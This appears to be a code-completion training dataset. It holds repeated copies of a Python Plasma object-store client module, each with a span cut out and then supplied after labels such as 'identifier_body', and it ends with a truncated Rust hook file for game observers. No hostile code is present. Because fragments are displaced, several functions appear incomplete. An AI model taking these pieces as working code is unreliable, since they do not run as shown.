def transfer(self, addr, port, object_id):
"""Transfer local object with id object_id to another plasma instance
Args:
addr (str): IPv4 address of the plasma instance the object is sent to.
port (int): Port number of the plasma instance the object is sent to.
object_id (str): A string used to identify an object.
"""
return libplasma.transfer(self.conn, object_id, addr, port)
def fetch(self, object_ids):
"""Fetch the object with id object_id from another plasma manager instance.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.fetch(self.conn, object_ids)
def wait(self, object_ids, timeout=PLASMA_WAIT_TIMEOUT, num_returns=1):
"""Wait until num_returns objects in object_ids are ready.
Args:
object_ids (List[str]): List of object IDs to wait for.
timeout (int): Return to the caller after timeout milliseconds.
num_returns (int): We are waiting for this number of objects to be ready.
Returns:
ready_ids, waiting_ids (List[str], List[str]): List of object IDs that
are ready and list of object IDs we might still wait on respectively.
"""
ready_ids, waiting_ids = libplasma.wait(self.conn, object_ids, timeout, num_returns)
return ready_ids, list(waiting_ids)
def subscribe(self):
"""Subscribe to notifications about sealed objects."""
fd = libplasma.subscribe(self.conn)
self.notification_sock = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)
# Make the socket non-blocking.
self.notification_sock.setblocking(0)
def get_next_notification(self):
"""Get the next notification from the notification socket."""
if not self.notification_sock:
raise Exception("To get notifications, first call subscribe.")
# Loop until we've read PLASMA_ID_SIZE bytes from the socket.
while True:
try:
message_data = self.notification_sock.recv(PLASMA_ID_SIZE)
except socket.error:
time.sleep(0.001)
else:
assert len(message_data) == PLASMA_ID_SIZE
break
return message_data
DEFAULT_PLASMA_STORE_MEMORY = 10 ** 9
def random_name():
return str(random.randint(0, 99999999))
def start_plasma_store(plasma_store_memory=DEFAULT_PLASMA_STORE_MEMORY, use_valgrind=False, use_profiler=False):
"""Start a plasma store process.
Args:
use_valgrind (bool): True if the plasma store should be started inside of
valgrind. If this is True, use_profiler must be False.
use_profiler (bool): True if the plasma store should be started inside a
profiler. If this is True, use_valgrind must be False.
Return:
A tuple of the name of the plasma store socket and the process ID of the
plasma store process.
"""
if use_valgrind and use_profiler:
raise Exception("Cannot use valgrind and profiler at the same time.")
plasma_store_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_store")
plasma_store_name = "/tmp/scheduler{}".format(random_name())
command = [plasma_store_executable, "-s", plasma_store_name, "-m", str(plasma_store_memory)]
if use_valgrind:
|
elif use_profiler:
pid = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
time.sleep(1.0)
else:
pid = subprocess.Popen(command)
time.sleep(0.1)
return plasma_store_name, pid
def start_plasma_manager(store_name, redis_address, num_retries=20, use_valgrind=False, run_profiler=False):
"""Start a plasma manager and return the ports it listens on.
Args:
store_name (str): The name of the plasma store socket.
redis_address (str): The address of the Redis server.
use_valgrind (bool): True if the Plasma manager should be started inside of
valgrind and False otherwise.
Returns:
A tuple of the Plasma manager socket name, the process ID of the Plasma
manager process, and the port that the manager is listening on.
Raises:
Exception: An exception is raised if the manager could not be started.
"""
plasma_manager_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_manager")
plasma_manager_name = "/tmp/scheduler{}".format(random_name())
port = None
process = None
counter = 0
while counter < num_retries:
if counter > 0:
print("Plasma manager failed to start, retrying now.")
port = random.randint(10000, 65535)
command = [plasma_manager_executable,
"-s", store_name,
"-m", plasma_manager_name,
"-h", "127.0.0.1",
"-p", str(port),
"-r", redis_address]
if use_valgrind:
process = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
elif run_profiler:
process = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
else:
process = subprocess.Popen(command)
# This sleep is critical. If the plasma_manager fails to start because the
# port is already in use, then we need it to fail within 0.1 seconds.
time.sleep(0.1)
# See if the process has terminated
if process.poll() == None:
return plasma_manager_name, process, port
counter += 1
raise Exception("Couldn't start plasma manager.")
| pid = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
time.sleep(1.0) | conditional_block |
plasma.py | import os
import random
import socket
import subprocess
import time
import libplasma
PLASMA_ID_SIZE = 20
PLASMA_WAIT_TIMEOUT = 2 ** 30
class PlasmaBuffer(object):
"""This is the type of objects returned by calls to get with a PlasmaClient.
We define our own class instead of directly returning a buffer object so that
we can add a custom destructor which notifies Plasma that the object is no
longer being used, so the memory in the Plasma store backing the object can
potentially be freed.
Attributes:
buffer (buffer): A buffer containing an object in the Plasma store.
plasma_id (PlasmaID): The ID of the object in the buffer.
plasma_client (PlasmaClient): The PlasmaClient that we use to communicate
with the store and manager.
"""
def __init__(self, buff, plasma_id, plasma_client):
"""Initialize a PlasmaBuffer."""
self.buffer = buff
self.plasma_id = plasma_id
self.plasma_client = plasma_client
def __del__(self):
"""Notify Plasma that the object is no longer needed.
If the plasma client has been shut down, then don't do anything.
"""
if self.plasma_client.alive:
libplasma.release(self.plasma_client.conn, self.plasma_id)
def __getitem__(self, index):
"""Read from the PlasmaBuffer as if it were just a regular buffer."""
return self.buffer[index]
def __setitem__(self, index, value):
"""Write to the PlasmaBuffer as if it were just a regular buffer.
This should fail because the buffer should be read only.
"""
self.buffer[index] = value
def __len__(self):
"""Return the length of the buffer."""
return len(self.buffer)
class PlasmaClient(object):
"""The PlasmaClient is used to interface with a plasma store and a plasma manager.
The PlasmaClient can ask the PlasmaStore to allocate a new buffer, seal a
buffer, and get a buffer. Buffers are referred to by object IDs, which are
strings.
"""
def __init__(self, store_socket_name, manager_socket_name=None, release_delay=64):
"""Initialize the PlasmaClient.
Args:
store_socket_name (str): Name of the socket the plasma store is listening at.
manager_socket_name (str): Name of the socket the plasma manager is listening at.
"""
self.alive = True
if manager_socket_name is not None:
self.conn = libplasma.connect(store_socket_name, manager_socket_name, release_delay)
else:
self.conn = libplasma.connect(store_socket_name, "", release_delay)
def shutdown(self):
"""Shutdown the client so that it does not send messages.
If we kill the Plasma store and Plasma manager that this client is connected
to, then we can use this method to prevent the client from trying to send
messages to the killed processes.
"""
if self.alive:
libplasma.disconnect(self.conn)
self.alive = False
def create(self, object_id, size, metadata=None):
"""Create a new buffer in the PlasmaStore for a particular object ID.
The returned buffer is mutable until seal is called.
Args:
object_id (str): A string used to identify an object.
size (int): The size in bytes of the created buffer.
metadata (buffer): An optional buffer encoding whatever metadata the user
wishes to encode.
"""
# Turn the metadata into the right type.
metadata = bytearray("") if metadata is None else metadata
buff = libplasma.create(self.conn, object_id, size, metadata)
return PlasmaBuffer(buff, object_id, self)
def | (self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block. The retrieved
buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[0]
return PlasmaBuffer(buff, object_id, self)
def get_metadata(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block until the object
has been sealed. The retrieved buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[1]
return PlasmaBuffer(buff, object_id, self)
def contains(self, object_id):
"""Check if the object is present and has been sealed in the PlasmaStore.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.contains(self.conn, object_id)
def seal(self, object_id):
"""Seal the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been sealed, the buffer is immutable and can only be
accessed through get.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.seal(self.conn, object_id)
def delete(self, object_id):
"""Delete the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been deleted, the buffer is no longer accessible.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.delete(self.conn, object_id)
def evict(self, num_bytes):
"""Evict some objects until to recover some bytes.
Recover at least num_bytes bytes if possible.
Args:
num_bytes (int): The number of bytes to attempt to recover.
"""
return libplasma.evict(self.conn, num_bytes)
def transfer(self, addr, port, object_id):
"""Transfer local object with id object_id to another plasma instance
Args:
addr (str): IPv4 address of the plasma instance the object is sent to.
port (int): Port number of the plasma instance the object is sent to.
object_id (str): A string used to identify an object.
"""
return libplasma.transfer(self.conn, object_id, addr, port)
def fetch(self, object_ids):
"""Fetch the object with id object_id from another plasma manager instance.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.fetch(self.conn, object_ids)
def wait(self, object_ids, timeout=PLASMA_WAIT_TIMEOUT, num_returns=1):
"""Wait until num_returns objects in object_ids are ready.
Args:
object_ids (List[str]): List of object IDs to wait for.
timeout (int): Return to the caller after timeout milliseconds.
num_returns (int): We are waiting for this number of objects to be ready.
Returns:
ready_ids, waiting_ids (List[str], List[str]): List of object IDs that
are ready and list of object IDs we might still wait on respectively.
"""
ready_ids, waiting_ids = libplasma.wait(self.conn, object_ids, timeout, num_returns)
return ready_ids, list(waiting_ids)
def subscribe(self):
"""Subscribe to notifications about sealed objects."""
fd = libplasma.subscribe(self.conn)
self.notification_sock = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)
# Make the socket non-blocking.
self.notification_sock.setblocking(0)
def get_next_notification(self):
"""Get the next notification from the notification socket."""
if not self.notification_sock:
raise Exception("To get notifications, first call subscribe.")
# Loop until we've read PLASMA_ID_SIZE bytes from the socket.
while True:
try:
message_data = self.notification_sock.recv(PLASMA_ID_SIZE)
except socket.error:
time.sleep(0.001)
else:
assert len(message_data) == PLASMA_ID_SIZE
break
return message_data
DEFAULT_PLASMA_STORE_MEMORY = 10 ** 9
def random_name():
return str(random.randint(0, 99999999))
def start_plasma_store(plasma_store_memory=DEFAULT_PLASMA_STORE_MEMORY, use_valgrind=False, use_profiler=False):
"""Start a plasma store process.
Args:
use_valgrind (bool): True if the plasma store should be started inside of
valgrind. If this is True, use_profiler must be False.
use_profiler (bool): True if the plasma store should be started inside a
profiler. If this is True, use_valgrind must be False.
Return:
A tuple of the name of the plasma store socket and the process ID of the
plasma store process.
"""
if use_valgrind and use_profiler:
raise Exception("Cannot use valgrind and profiler at the same time.")
plasma_store_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_store")
plasma_store_name = "/tmp/scheduler{}".format(random_name())
command = [plasma_store_executable, "-s", plasma_store_name, "-m", str(plasma_store_memory)]
if use_valgrind:
pid = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
time.sleep(1.0)
elif use_profiler:
pid = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
time.sleep(1.0)
else:
pid = subprocess.Popen(command)
time.sleep(0.1)
return plasma_store_name, pid
def start_plasma_manager(store_name, redis_address, num_retries=20, use_valgrind=False, run_profiler=False):
"""Start a plasma manager and return the ports it listens on.
Args:
store_name (str): The name of the plasma store socket.
redis_address (str): The address of the Redis server.
use_valgrind (bool): True if the Plasma manager should be started inside of
valgrind and False otherwise.
Returns:
A tuple of the Plasma manager socket name, the process ID of the Plasma
manager process, and the port that the manager is listening on.
Raises:
Exception: An exception is raised if the manager could not be started.
"""
plasma_manager_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_manager")
plasma_manager_name = "/tmp/scheduler{}".format(random_name())
port = None
process = None
counter = 0
while counter < num_retries:
if counter > 0:
print("Plasma manager failed to start, retrying now.")
port = random.randint(10000, 65535)
command = [plasma_manager_executable,
"-s", store_name,
"-m", plasma_manager_name,
"-h", "127.0.0.1",
"-p", str(port),
"-r", redis_address]
if use_valgrind:
process = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
elif run_profiler:
process = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
else:
process = subprocess.Popen(command)
# This sleep is critical. If the plasma_manager fails to start because the
# port is already in use, then we need it to fail within 0.1 seconds.
time.sleep(0.1)
# See if the process has terminated
if process.poll() == None:
return plasma_manager_name, process, port
counter += 1
raise Exception("Couldn't start plasma manager.")
| get | identifier_name |
plasma.py | import os
import random
import socket
import subprocess
import time
import libplasma
PLASMA_ID_SIZE = 20
PLASMA_WAIT_TIMEOUT = 2 ** 30
class PlasmaBuffer(object):
"""This is the type of objects returned by calls to get with a PlasmaClient.
We define our own class instead of directly returning a buffer object so that
we can add a custom destructor which notifies Plasma that the object is no
longer being used, so the memory in the Plasma store backing the object can
potentially be freed.
Attributes:
buffer (buffer): A buffer containing an object in the Plasma store.
plasma_id (PlasmaID): The ID of the object in the buffer.
plasma_client (PlasmaClient): The PlasmaClient that we use to communicate
with the store and manager.
"""
def __init__(self, buff, plasma_id, plasma_client):
"""Initialize a PlasmaBuffer."""
self.buffer = buff
self.plasma_id = plasma_id
self.plasma_client = plasma_client
def __del__(self):
"""Notify Plasma that the object is no longer needed.
If the plasma client has been shut down, then don't do anything.
"""
if self.plasma_client.alive:
libplasma.release(self.plasma_client.conn, self.plasma_id)
def __getitem__(self, index):
"""Read from the PlasmaBuffer as if it were just a regular buffer."""
return self.buffer[index]
def __setitem__(self, index, value):
"""Write to the PlasmaBuffer as if it were just a regular buffer.
This should fail because the buffer should be read only.
"""
self.buffer[index] = value
def __len__(self):
"""Return the length of the buffer."""
return len(self.buffer)
class PlasmaClient(object):
"""The PlasmaClient is used to interface with a plasma store and a plasma manager.
The PlasmaClient can ask the PlasmaStore to allocate a new buffer, seal a
buffer, and get a buffer. Buffers are referred to by object IDs, which are
strings.
"""
def __init__(self, store_socket_name, manager_socket_name=None, release_delay=64):
"""Initialize the PlasmaClient.
Args:
store_socket_name (str): Name of the socket the plasma store is listening at.
manager_socket_name (str): Name of the socket the plasma manager is listening at.
"""
self.alive = True
if manager_socket_name is not None:
self.conn = libplasma.connect(store_socket_name, manager_socket_name, release_delay)
else:
self.conn = libplasma.connect(store_socket_name, "", release_delay)
def shutdown(self):
"""Shutdown the client so that it does not send messages.
If we kill the Plasma store and Plasma manager that this client is connected
to, then we can use this method to prevent the client from trying to send
messages to the killed processes.
"""
if self.alive:
libplasma.disconnect(self.conn)
self.alive = False
def create(self, object_id, size, metadata=None):
"""Create a new buffer in the PlasmaStore for a particular object ID.
The returned buffer is mutable until seal is called.
Args:
object_id (str): A string used to identify an object.
size (int): The size in bytes of the created buffer.
metadata (buffer): An optional buffer encoding whatever metadata the user
wishes to encode.
"""
# Turn the metadata into the right type.
metadata = bytearray("") if metadata is None else metadata
buff = libplasma.create(self.conn, object_id, size, metadata)
return PlasmaBuffer(buff, object_id, self)
def get(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block. The retrieved
buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[0]
return PlasmaBuffer(buff, object_id, self)
def get_metadata(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block until the object
has been sealed. The retrieved buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[1]
return PlasmaBuffer(buff, object_id, self)
def contains(self, object_id):
"""Check if the object is present and has been sealed in the PlasmaStore.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.contains(self.conn, object_id)
def seal(self, object_id):
"""Seal the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been sealed, the buffer is immutable and can only be
accessed through get.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.seal(self.conn, object_id)
def delete(self, object_id):
"""Delete the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been deleted, the buffer is no longer accessible.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.delete(self.conn, object_id)
def evict(self, num_bytes):
"""Evict some objects until to recover some bytes.
Recover at least num_bytes bytes if possible.
Args:
num_bytes (int): The number of bytes to attempt to recover.
"""
return libplasma.evict(self.conn, num_bytes)
def transfer(self, addr, port, object_id):
"""Transfer local object with id object_id to another plasma instance
Args:
addr (str): IPv4 address of the plasma instance the object is sent to.
port (int): Port number of the plasma instance the object is sent to.
object_id (str): A string used to identify an object.
"""
return libplasma.transfer(self.conn, object_id, addr, port)
def fetch(self, object_ids):
"""Fetch the object with id object_id from another plasma manager instance.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.fetch(self.conn, object_ids)
def wait(self, object_ids, timeout=PLASMA_WAIT_TIMEOUT, num_returns=1):
"""Wait until num_returns objects in object_ids are ready.
Args:
object_ids (List[str]): List of object IDs to wait for.
timeout (int): Return to the caller after timeout milliseconds.
num_returns (int): We are waiting for this number of objects to be ready.
Returns:
ready_ids, waiting_ids (List[str], List[str]): List of object IDs that
are ready and list of object IDs we might still wait on respectively.
"""
ready_ids, waiting_ids = libplasma.wait(self.conn, object_ids, timeout, num_returns)
return ready_ids, list(waiting_ids)
def subscribe(self):
"""Subscribe to notifications about sealed objects."""
fd = libplasma.subscribe(self.conn)
self.notification_sock = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)
# Make the socket non-blocking.
self.notification_sock.setblocking(0)
def get_next_notification(self):
"""Get the next notification from the notification socket."""
if not self.notification_sock:
raise Exception("To get notifications, first call subscribe.")
# Loop until we've read PLASMA_ID_SIZE bytes from the socket.
while True:
try:
message_data = self.notification_sock.recv(PLASMA_ID_SIZE)
except socket.error:
time.sleep(0.001)
else:
assert len(message_data) == PLASMA_ID_SIZE
break
return message_data
DEFAULT_PLASMA_STORE_MEMORY = 10 ** 9
def random_name():
return str(random.randint(0, 99999999))
def start_plasma_store(plasma_store_memory=DEFAULT_PLASMA_STORE_MEMORY, use_valgrind=False, use_profiler=False):
|
def start_plasma_manager(store_name, redis_address, num_retries=20, use_valgrind=False, run_profiler=False):
"""Start a plasma manager and return the ports it listens on.
Args:
store_name (str): The name of the plasma store socket.
redis_address (str): The address of the Redis server.
use_valgrind (bool): True if the Plasma manager should be started inside of
valgrind and False otherwise.
Returns:
A tuple of the Plasma manager socket name, the process ID of the Plasma
manager process, and the port that the manager is listening on.
Raises:
Exception: An exception is raised if the manager could not be started.
"""
plasma_manager_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_manager")
plasma_manager_name = "/tmp/scheduler{}".format(random_name())
port = None
process = None
counter = 0
while counter < num_retries:
if counter > 0:
print("Plasma manager failed to start, retrying now.")
port = random.randint(10000, 65535)
command = [plasma_manager_executable,
"-s", store_name,
"-m", plasma_manager_name,
"-h", "127.0.0.1",
"-p", str(port),
"-r", redis_address]
if use_valgrind:
process = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
elif run_profiler:
process = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
else:
process = subprocess.Popen(command)
# This sleep is critical. If the plasma_manager fails to start because the
# port is already in use, then we need it to fail within 0.1 seconds.
time.sleep(0.1)
# See if the process has terminated
if process.poll() == None:
return plasma_manager_name, process, port
counter += 1
raise Exception("Couldn't start plasma manager.")
| """Start a plasma store process.
Args:
use_valgrind (bool): True if the plasma store should be started inside of
valgrind. If this is True, use_profiler must be False.
use_profiler (bool): True if the plasma store should be started inside a
profiler. If this is True, use_valgrind must be False.
Return:
A tuple of the name of the plasma store socket and the process ID of the
plasma store process.
"""
if use_valgrind and use_profiler:
raise Exception("Cannot use valgrind and profiler at the same time.")
plasma_store_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_store")
plasma_store_name = "/tmp/scheduler{}".format(random_name())
command = [plasma_store_executable, "-s", plasma_store_name, "-m", str(plasma_store_memory)]
if use_valgrind:
pid = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
time.sleep(1.0)
elif use_profiler:
pid = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
time.sleep(1.0)
else:
pid = subprocess.Popen(command)
time.sleep(0.1)
return plasma_store_name, pid | identifier_body |
plasma.py | import os
import random
import socket
import subprocess
import time
import libplasma
PLASMA_ID_SIZE = 20
PLASMA_WAIT_TIMEOUT = 2 ** 30
class PlasmaBuffer(object):
"""This is the type of objects returned by calls to get with a PlasmaClient.
We define our own class instead of directly returning a buffer object so that
we can add a custom destructor which notifies Plasma that the object is no
longer being used, so the memory in the Plasma store backing the object can
potentially be freed.
Attributes:
buffer (buffer): A buffer containing an object in the Plasma store.
plasma_id (PlasmaID): The ID of the object in the buffer.
plasma_client (PlasmaClient): The PlasmaClient that we use to communicate
with the store and manager.
"""
def __init__(self, buff, plasma_id, plasma_client):
"""Initialize a PlasmaBuffer."""
self.buffer = buff
self.plasma_id = plasma_id
self.plasma_client = plasma_client
def __del__(self):
"""Notify Plasma that the object is no longer needed.
If the plasma client has been shut down, then don't do anything.
"""
if self.plasma_client.alive:
libplasma.release(self.plasma_client.conn, self.plasma_id)
def __getitem__(self, index):
"""Read from the PlasmaBuffer as if it were just a regular buffer."""
return self.buffer[index]
def __setitem__(self, index, value):
"""Write to the PlasmaBuffer as if it were just a regular buffer.
This should fail because the buffer should be read only.
"""
self.buffer[index] = value
def __len__(self):
"""Return the length of the buffer."""
return len(self.buffer)
class PlasmaClient(object):
"""The PlasmaClient is used to interface with a plasma store and a plasma manager.
The PlasmaClient can ask the PlasmaStore to allocate a new buffer, seal a
buffer, and get a buffer. Buffers are referred to by object IDs, which are
strings.
"""
def __init__(self, store_socket_name, manager_socket_name=None, release_delay=64):
"""Initialize the PlasmaClient.
Args:
store_socket_name (str): Name of the socket the plasma store is listening at.
manager_socket_name (str): Name of the socket the plasma manager is listening at.
"""
self.alive = True
if manager_socket_name is not None:
self.conn = libplasma.connect(store_socket_name, manager_socket_name, release_delay)
else:
self.conn = libplasma.connect(store_socket_name, "", release_delay)
def shutdown(self):
"""Shutdown the client so that it does not send messages.
If we kill the Plasma store and Plasma manager that this client is connected
to, then we can use this method to prevent the client from trying to send
messages to the killed processes.
"""
if self.alive:
libplasma.disconnect(self.conn)
self.alive = False
def create(self, object_id, size, metadata=None):
"""Create a new buffer in the PlasmaStore for a particular object ID.
The returned buffer is mutable until seal is called.
Args:
object_id (str): A string used to identify an object.
size (int): The size in bytes of the created buffer.
metadata (buffer): An optional buffer encoding whatever metadata the user
wishes to encode.
"""
# Turn the metadata into the right type.
metadata = bytearray("") if metadata is None else metadata
buff = libplasma.create(self.conn, object_id, size, metadata)
return PlasmaBuffer(buff, object_id, self)
def get(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block. The retrieved
buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[0]
return PlasmaBuffer(buff, object_id, self)
def get_metadata(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block until the object
has been sealed. The retrieved buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[1]
return PlasmaBuffer(buff, object_id, self)
def contains(self, object_id):
"""Check if the object is present and has been sealed in the PlasmaStore.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.contains(self.conn, object_id)
def seal(self, object_id):
"""Seal the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been sealed, the buffer is immutable and can only be
accessed through get.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.seal(self.conn, object_id)
def delete(self, object_id):
"""Delete the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been deleted, the buffer is no longer accessible.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.delete(self.conn, object_id)
def evict(self, num_bytes):
"""Evict some objects until to recover some bytes.
Recover at least num_bytes bytes if possible.
Args:
num_bytes (int): The number of bytes to attempt to recover. | def transfer(self, addr, port, object_id):
"""Transfer local object with id object_id to another plasma instance
Args:
addr (str): IPv4 address of the plasma instance the object is sent to.
port (int): Port number of the plasma instance the object is sent to.
object_id (str): A string used to identify an object.
"""
return libplasma.transfer(self.conn, object_id, addr, port)
def fetch(self, object_ids):
"""Fetch the object with id object_id from another plasma manager instance.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.fetch(self.conn, object_ids)
def wait(self, object_ids, timeout=PLASMA_WAIT_TIMEOUT, num_returns=1):
"""Wait until num_returns objects in object_ids are ready.
Args:
object_ids (List[str]): List of object IDs to wait for.
timeout (int): Return to the caller after timeout milliseconds.
num_returns (int): We are waiting for this number of objects to be ready.
Returns:
ready_ids, waiting_ids (List[str], List[str]): List of object IDs that
are ready and list of object IDs we might still wait on respectively.
"""
ready_ids, waiting_ids = libplasma.wait(self.conn, object_ids, timeout, num_returns)
return ready_ids, list(waiting_ids)
def subscribe(self):
"""Subscribe to notifications about sealed objects."""
fd = libplasma.subscribe(self.conn)
self.notification_sock = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)
# Make the socket non-blocking.
self.notification_sock.setblocking(0)
def get_next_notification(self):
"""Get the next notification from the notification socket."""
if not self.notification_sock:
raise Exception("To get notifications, first call subscribe.")
# Loop until we've read PLASMA_ID_SIZE bytes from the socket.
while True:
try:
message_data = self.notification_sock.recv(PLASMA_ID_SIZE)
except socket.error:
time.sleep(0.001)
else:
assert len(message_data) == PLASMA_ID_SIZE
break
return message_data
DEFAULT_PLASMA_STORE_MEMORY = 10 ** 9
def random_name():
return str(random.randint(0, 99999999))
def start_plasma_store(plasma_store_memory=DEFAULT_PLASMA_STORE_MEMORY, use_valgrind=False, use_profiler=False):
"""Start a plasma store process.
Args:
use_valgrind (bool): True if the plasma store should be started inside of
valgrind. If this is True, use_profiler must be False.
use_profiler (bool): True if the plasma store should be started inside a
profiler. If this is True, use_valgrind must be False.
Return:
A tuple of the name of the plasma store socket and the process ID of the
plasma store process.
"""
if use_valgrind and use_profiler:
raise Exception("Cannot use valgrind and profiler at the same time.")
plasma_store_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_store")
plasma_store_name = "/tmp/scheduler{}".format(random_name())
command = [plasma_store_executable, "-s", plasma_store_name, "-m", str(plasma_store_memory)]
if use_valgrind:
pid = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
time.sleep(1.0)
elif use_profiler:
pid = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
time.sleep(1.0)
else:
pid = subprocess.Popen(command)
time.sleep(0.1)
return plasma_store_name, pid
def start_plasma_manager(store_name, redis_address, num_retries=20, use_valgrind=False, run_profiler=False):
"""Start a plasma manager and return the ports it listens on.
Args:
store_name (str): The name of the plasma store socket.
redis_address (str): The address of the Redis server.
use_valgrind (bool): True if the Plasma manager should be started inside of
valgrind and False otherwise.
Returns:
A tuple of the Plasma manager socket name, the process ID of the Plasma
manager process, and the port that the manager is listening on.
Raises:
Exception: An exception is raised if the manager could not be started.
"""
plasma_manager_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_manager")
plasma_manager_name = "/tmp/scheduler{}".format(random_name())
port = None
process = None
counter = 0
while counter < num_retries:
if counter > 0:
print("Plasma manager failed to start, retrying now.")
port = random.randint(10000, 65535)
command = [plasma_manager_executable,
"-s", store_name,
"-m", plasma_manager_name,
"-h", "127.0.0.1",
"-p", str(port),
"-r", redis_address]
if use_valgrind:
process = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
elif run_profiler:
process = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
else:
process = subprocess.Popen(command)
# This sleep is critical. If the plasma_manager fails to start because the
# port is already in use, then we need it to fail within 0.1 seconds.
time.sleep(0.1)
# See if the process has terminated
if process.poll() == None:
return plasma_manager_name, process, port
counter += 1
raise Exception("Couldn't start plasma manager.") | """
return libplasma.evict(self.conn, num_bytes)
| random_line_split |
observing.rs | use std::ffi::CStr;
use std::mem;
use libc::c_void;
use crate::bw;
use crate::bw_1161::{self, vars};
pub unsafe fn process_commands_hook(
data: *const u8,
len: u32,
replay: u32,
orig: unsafe extern fn(*const u8, u32, u32),
) {
if replay == 0 && *vars::current_command_player >= 8 {
// Replace anything sent by observers with a keep alive command, I'm quite sure there will
// be buffer overflows otherwise.
let buf = [0x05u8];
orig(buf.as_ptr(), 1, replay);
} else {
orig(data, len, replay);
}
}
// Don't validate sync commands when observing. As the sync contains visibility info, observers
// are out of sync from everyone else, as their vision settings are not sent to other players.
pub unsafe fn sync_command_hook(
data: *const u8,
orig: unsafe extern fn(*const u8) -> u32,
) -> u32 {
if is_local_player_observer() {
1
} else {
orig(data)
}
}
pub unsafe fn chat_message_hook(
storm_player: u32,
message: *const u8,
length: u32,
orig: unsafe extern fn(u32, *const u8, u32) -> u32,
) -> u32 {
use std::io::Write;
if vars::storm_id_to_human_id[storm_player as usize] >= 8 {
// Observer message, we'll have to manually print text and add to replay recording.
let message = std::slice::from_raw_parts(message, length as usize);
// The length should include null byte
if message.last() != Some(&0) {
return 0;
}
// There's some unnecessary control information at the start of message
let text = match message.get(2..(message.len() - 1)) {
Some(s) => s,
None => return 0,
};
let mut buf = [0; 512];
let format = |mut pos: &mut [u8], msg_color: u8| -> Result<(), std::io::Error> {
// Write "\x1f{player}: \x02{message}"
// 0x1f is the neutral cyan color and 0x02 is the regular chat message one.
write!(&mut pos, "\x1f")?;
let name = CStr::from_ptr(
vars::storm_players[storm_player as usize].name.as_ptr() as *const i8
);
pos.write_all(name.to_bytes())?;
write!(&mut pos, ": ")?;
pos.write_all(&[msg_color])?;
pos.write_all(text)?;
Ok(())
};
let _ = format(&mut buf[..], 0x02);
let mut replay_command = [0u8; 0x52];
replay_command[0] = 0x5c; // Replay chat
replay_command[1] = 0x8; // Player
let _ = (&mut replay_command[2..]).write(&buf[..]);
replay_command[0x51] = 0;
bw_1161::add_to_replay_data(
*vars::replay_data,
